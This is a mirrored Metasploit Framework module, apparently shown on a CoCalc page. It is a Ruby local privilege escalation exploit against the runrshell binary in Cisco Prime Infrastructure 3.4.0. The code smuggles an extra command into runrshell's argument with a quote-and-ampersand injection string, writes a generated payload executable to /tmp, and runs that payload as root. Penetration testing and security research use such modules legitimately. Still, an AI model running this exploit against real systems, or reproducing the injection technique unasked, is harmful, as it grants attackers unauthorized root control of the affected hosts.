CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/local/cpi_runrshell_priv_esc.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = ExcellentRanking

8


9
  include Msf::Post::File

10
  include Msf::Exploit::EXE

11
  include Msf::Exploit::FileDropper

12


13
  def initialize(info = {})

14
    super( update_info( info,

15
      'Name'           => 'Cisco Prime Infrastructure Runrshell Privilege Escalation',

16
      'Description'    => %q{

17
        This modules exploits a vulnerability in Cisco Prime Infrastructure's runrshell binary. The

18
        runrshell binary is meant to execute a shell script as root, but can be abused to inject

19
        extra commands in the argument, allowing you to execute anything as root.

20
      },

21
      'License'        => MSF_LICENSE,

22
      'Author'         =>

23
        [

24
          'Pedro Ribeiro <pedrib[at]gmail.com>', # First discovery

25
          'sinn3r'                               # Metasploit module

26
        ],

27
      'Platform'       => ['linux'],

28
      'Arch'           => [ARCH_X86, ARCH_X64],

29
      'SessionTypes'   => ['shell', 'meterpreter'],

30
      'DisclosureDate' => '2018-12-08',

31
      'Privileged'     => true,

32
      'References'     =>

33
        [

34
          ['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/cisco-prime-infrastructure.txt#L56'],

35
        ],

36
      'Targets'        =>

37
        [

38
          [ 'Cisco Prime Infrastructure 3.4.0', {} ]

39
        ],

40
      'DefaultTarget'  => 0

41
     ))

42


43
    register_advanced_options [

44
      OptString.new('WritableDir', [true, 'A directory where we can write the payload', '/tmp'])

45
    ]

46
  end

47


48
  def exec_as_root(cmd)

49
    command_string = "/opt/CSCOlumos/bin/runrshell '\" && #{cmd} #'"

50
    vprint_status(cmd_exec(command_string))

51
  end

52


53
  def exploit

54
    payload_name = "#{Rex::Text.rand_text_alpha(10)}.bin"

55
    exe_path = Rex::FileUtils.normalize_unix_path(datastore['WritableDir'], payload_name)

56
    print_status("Uploading #{exe_path}")

57
    write_file(exe_path, generate_payload_exe)

58
    unless file?(exe_path)

59
      print_error("Failed to upload #{exe_path}")

60
      return

61
    end

62


63
    register_file_for_cleanup(exe_path)

64
    print_status('chmod the file with +x')

65
    exec_as_root("/bin/chmod +x #{exe_path}")

66
    print_status("Executing #{exe_path}")

67
    exec_as_root(exe_path)

68
  end

69
end

70


71